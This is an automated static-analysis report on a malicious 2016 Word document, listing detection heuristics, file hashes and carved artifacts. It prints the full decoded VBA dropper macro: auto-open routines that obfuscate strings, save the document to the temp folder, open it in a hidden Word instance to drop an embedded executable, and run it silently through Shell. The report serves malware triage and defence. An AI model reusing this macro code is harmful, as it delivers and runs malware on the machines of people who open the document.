Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c9236e6107b3678…

MALICIOUS

Office (OLE)

174.5 KB Created: 2016-02-18 08:45:00 Authoring application: Microsoft Office Word First seen: 2016-02-27
MD5: b36bca84c8219eb0bc6393c01127b514 SHA-1: 8e80390f537cf641c8c78d1d24afb3fa9e24fd47 SHA-256: 7c9236e6107b36785cc3ddd9890dc919a7a9c0ecf40cc03e70af4677b6caee5f
634 Risk Score

Heuristics 17

  • ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: BC.Win.Packer.Troll-14
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ngp = Shell(nbew, 0)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set ppMNbwjBwq = CreateObject(KojfNBeq(23 + 64) & "o" & "rd" & ".A" & "pplication")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ppMNbwjBwq = CreateObject(KojfNBeq(23 + 64) & "o" & "rd" & ".A" & "pplication")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    LLKKMN = Environ(TYYYWE) + BGEVQWE
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2025 bytes
SHA-256: f4e3d290abe08f4c444545132c387af64242fa75b4fdee805fbe426b6d50e267
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Tybgeywq()
    Oiqdbheq
End Sub
Sub Oiqdbheq()
Dim fdaa As Integer
Dim IIOIWN As String, nefq As Boolean
nefq = False
POKNDJWQ = DatePart("yyyy", "10/11/7242")
POKNDJWQ = Left(POKNDJWQ, 1)
TYYYWE = "EM"
fdaa = CInt(POKNDJWQ) - 8
On Error Resume Next
BGEVQWE = Left("\je9\", 1)
TYYYWE = "T" & TYYYWE + "P"
LLKKMN = Environ(TYYYWE) + BGEVQWE
RTQCDW = KojfNBeq(41 + 5)
RREW = RTQCDW + KojfNBeq(6 + 96 + fdaa)
RREW = RREW & "x" + KojfNBeq(10 + 91)
UUIIW = RTQCDW & KojfNBeq(-6 + 120) & KojfNBeq(5 + 110 + 1) + "f"

BBBVQWGD = LLKKMN + "vbyeq" + UUIIW
DDDHUQWD = LLKKMN + "ioorjq" + UUIIW
IIOIWN = LLKKMN + "ppo2" & RREW

YRwfvq (BBBVQWGD)
YRwfvq (DDDHUQWD)
Module1.Lifand (2)
QWJDQ = LLKKMN + "vbyeq" & ".r" + "tf"
HYUQWD = "lkf lwkejflkhqjkwdq"
Set ppMNbwjBwq = CreateObject(KojfNBeq(23 + 64) & "o" & "rd" & ".A" & "pplication")
ppMNbwjBwq.Visible = nefq
ppMNbwjBwq.Documents.Open (QWJDQ)
Module1.Lifand (2)
HYUASGD = Module1.Trwnw(IIOIWN)
Module1.Lifand (2)
ppMNbwjBwq.Quit
Set ppMNbwjBwq = Nothing
End Sub
Public Function KojfNBeq(ande As Integer)
    KojfNBeq = Chr(ande)
End Function
Sub Workbook_Open()
    Oiqdbheq
End Sub
Sub AutoOpen()
    BVTQWDQ = "l1j2e ;12lke ;1j12lk"
    Tybgeywq
End Sub
Public Function YRwfvq(wqnd As String)
    ActiveDocument.SaveAs FileName:=wqnd, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    Oiqdbheq
End Sub








Attribute VB_Name = "Module1"
Sub Lifand(Kore As Long)
Dim Hhee As Long
Dim Tybe As Long
BTYUQWVD = "lq;1p[2o3ep1 ' "
Tybe = Kore + Timer
Hhee = Tybe
Do While Timer < Hhee
DoEvents
Loop
End Sub
Public Function Trwnw(nbew As String)
Dim ngp As Variant
ngp = Shell(nbew, 0)
End Function
embedded_office_00006250.exe embedded-pe Office MZ+PE at offset 0x6250 153520 bytes
SHA-256: 767851c7e6a0f1aad5320eaaca3544445141348e8ac557f71f78215e109fa11b
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1517324183/Ole10Native 130770 bytes
SHA-256: ee998cd704d958561a42c23973fe176617d68bda9c5a37a668fc63eb5998155e
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved artifact entropy is 7.61, consistent with packed or encrypted content.
ole10native_00_ppo2.exe ole-package-payload OLE Ole10Native payload: ObjectPool/_1517324183/Ole10Native; display_name=; full_path=C:\Users\M\AppData\Local\Temp\ppo2.exe; temp_path=; def_file= 130560 bytes
SHA-256: 0e88996efc4b2f0c408daddf224139f7cc59f2154c13ccb53b163fc1b8d912dd
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved artifact entropy is 7.61, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.